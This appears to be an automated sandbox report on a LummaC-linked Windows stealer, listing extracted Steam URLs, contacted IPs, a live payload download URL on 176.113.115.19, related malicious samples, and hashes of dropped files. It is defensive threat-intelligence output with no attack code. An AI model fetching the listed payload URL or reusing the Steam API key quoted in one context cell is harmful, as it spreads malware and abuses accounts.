https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp	89AC.tmp.exe, 00000007.00000003.1382256815.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.10.dr	false		high
https://store.steampowered.com/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exev8	NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exe#	NDWffRLk7z.exe, 00000004.00000002.3750636895.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.3617507302.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeT	NDWffRLk7z.exe, 00000004.00000002.3750636895.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.3617507302.0000000000628000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000003.1341587383.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	89AC.tmp.exe, 00000007.00000002.1602159928.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop	89AC.tmp.exe, 00000007.00000003.1381979764.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381850134.000000000082E000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602215869.0000000000861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381325223.0000000000863000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589516
Start date and time:	2025-01-12 17:46:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NDWffRLk7z.exe renamed because original name is a hash value
Original Sample Name:	9f08d109672d30fdd700843d3518d0e4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@11/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 41 Number of non-executed functions: 345
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.45, 40.126.32.74, 20.12.23.50
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:47:03	API Interceptor	8686422x Sleep call for process: NDWffRLk7z.exe modified
11:47:07	API Interceptor	3x Sleep call for process: 89AC.tmp.exe modified
11:47:31	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse
	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse
	InstallSetup.exe	Get hash	malicious	LummaC	Browse
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
steamcommunity.com	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	104.102.49.254
	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	H5JVfa61AV.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	2EG0jAmtY6.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	104.102.49.254
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	x.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	tasAgNgjbJ.exe	Get hash	malicious	Unknown	Browse	172.67.185.28
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	104.21.14.233
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	104.26.11.53
	mNPTwHOuvT.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.162.17
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	Loader.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	104.21.85.189
SELECTELRU	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	176.113.115.170.ps1	Get hash	malicious	XWorm	Browse	176.113.115.170
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	1In8uYbvZJ.ps1	Get hash	malicious	Unknown	Browse	176.113.115.177
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
AKAMAI-ASUS	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	104.102.49.254
	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	H5JVfa61AV.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	2EG0jAmtY6.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	104.102.49.254
	mNPTwHOuvT.exe	Get hash	malicious	Vidar	Browse	23.49.251.20
	res.mips.elf	Get hash	malicious	Unknown	Browse	184.85.6.161
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	104.102.49.254
	sE5IdDeTp2.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	H5JVfa61AV.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	2EG0jAmtY6.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	5vrRrFN56j.exe	Get hash	malicious	Bdaejec	Browse	104.102.49.254
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	104.102.49.254
	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
37f463bf4616ecd445d4a1937da06e19	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	172.67.179.207
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.179.207
	Setup.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	gem2.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.179.207
	1387457-38765948.15.exe	Get hash	malicious	Nitol	Browse	172.67.179.207
	1387457-38765948.15.exe	Get hash	malicious	Unknown	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_89AC.tmp.exe_c7573049a43a868158876825174a764e1e992_b6b8f336_9eeada63-c3e8-4d4f-a274-b2eff002f940\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9666714202126879
Encrypted:	false
SSDEEP:	96:hY2iJS0sbFsRhBVod7Rr6tQXIDcQqc6mcEKcw34eM+HbHg/wWGTf3hOyc45WAU6d:a7svbF600kigM6jsFRzuiFxZ24IO8/
MD5:	050BD39EBB2665F1EFF0794E1331887F
SHA1:	0E9C2F73607896CC28DAFBE087EAC8533BA44767
SHA-256:	0252E59EB0D22F8BD331945BCE5B4D46CE7D5D6E57C1FFCA69745C8164026FDF
SHA-512:	2D302B6B621BDA63940FC342F1BF4A60A408A2EE27073BA91F09B59682DA8AD8A9DB23F6A6F3CD88CDDFCF5527E1CC1C9E694E0DB1B658B7636BC6DA2717D646
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.1.7.4.0.3.0.0.4.5.4.8.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.1.7.4.0.3.0.5.4.5.4.8.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.e.a.d.a.6.3.-.c.3.e.8.-.4.d.4.f.-.a.2.7.4.-.b.2.e.f.f.0.0.2.f.9.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.2.c.9.f.1.b.-.8.c.9.4.-.4.3.8.7.-.9.1.7.6.-.7.d.6.4.6.4.6.d.7.0.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.9.A.C...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.4.-.0.0.0.1.-.0.0.1.3.-.e.2.3.3.-.a.e.9.c.1.1.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.f.f.3.c.3.9.8.6.a.e.5.3.4.3.a.b.4.5.0.a.4.0.d.8.2.4.c.1.8.3.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.8.f.a.1.7.d.0.5.2.5.1.b.5.1.5.c.c.5.2.6.9.4.3.3.5.a.8.8.c.7.a.6.0.9.e.3.0.3.!.8.9.A.C...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7578.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Jan 12 16:47:10 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	45074
Entropy (8bit):	2.5022056607555374
Encrypted:	false
SSDEEP:	192:RpCMXXA5CrGp+WP+WwqOp1BdqIIiNCUjhU7vdGqWU1oAzlEbUVu4EZJ17D:GMNrGxP+B17BMIfFiEI1nlHVw1H
MD5:	DE1B242B089161FD7150B977985CEF86
SHA1:	E791B6C464182047A73626F0B85BD15C78596580
SHA-256:	84D7066AAE146C57AFA49854A529B9DD387C40CA599C91ADC1D800C356C4E529
SHA-512:	EE8E8D9A69E51405D7CD85F52B948A5206782A2AB707466251F7BC30B186E3F143FA2101482E709630AFD3CFB8E1B96E232829210429AE5FD3C4AEDB7A972D29
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........g............4...............H.......l...<.......d....,..........`.......8...........T........... @...o......................................................................................................eJ......, ......GenuineIntel............T.......T.....g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7683.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8392
Entropy (8bit):	3.6998259657722907
Encrypted:	false
SSDEEP:	192:R6l7wVeJfX6iq6YZsDk6Igmfn94bypDm89bglsfGgm:R6lXJf6iq6YZWk6Igmfn9zg+fY
MD5:	6C43F7EF2A9B66DE2D124C164EC27DC1
SHA1:	B82B3F49E091C0DFDADD304BFB6512B7C72EA5B5
SHA-256:	BABFE646A3D2C91824A6F5CC3C865FA90CAB50DEE32EE3948BC442D0FE6B7A2B
SHA-512:	4A954E1C0D954FB0D7628F7D04DC2424CB9D1E30159D63501B6F6B7F0F988B9076A51395904CDB8D708207E7900131211EC587E11E8B92271E672CC8D0298110
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER76C2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.4759754537690215
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9MHWpW8VYa7Ym8M4JuFO3FDP+q8v/FOqXeNp5d:uIjfxI7y27VsJ+aKNNuNp5d
MD5:	0AAE3C4D72B6D3B2455EB8BA5DD0FC8D
SHA1:	6D09C49A089E984D56B14244700A53C0DB08F5E2
SHA-256:	93B2723A1A284F805D5570E94D80D9AFA15E0EE1126FAB0592A167A2E1C1F45D
SHA-512:	F1EB0C0AADBB7855A5FA343DF5FB2FE86595FC7CD5549A7277E26AF1EEEDD5FB6D6E014BA121A87240AC9736FBC74205E63380BFABEE592A2CB5B03D61A97011
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672949" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\NDWffRLk7z.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	403968
Entropy (8bit):	6.686761413395804
Encrypted:	false
SSDEEP:	3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
MD5:	08494E6A1E788EA3259955A4524FDFEC
SHA1:	2C8FA17D05251B515CC52694335A88C7A609E303
SHA-256:	9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
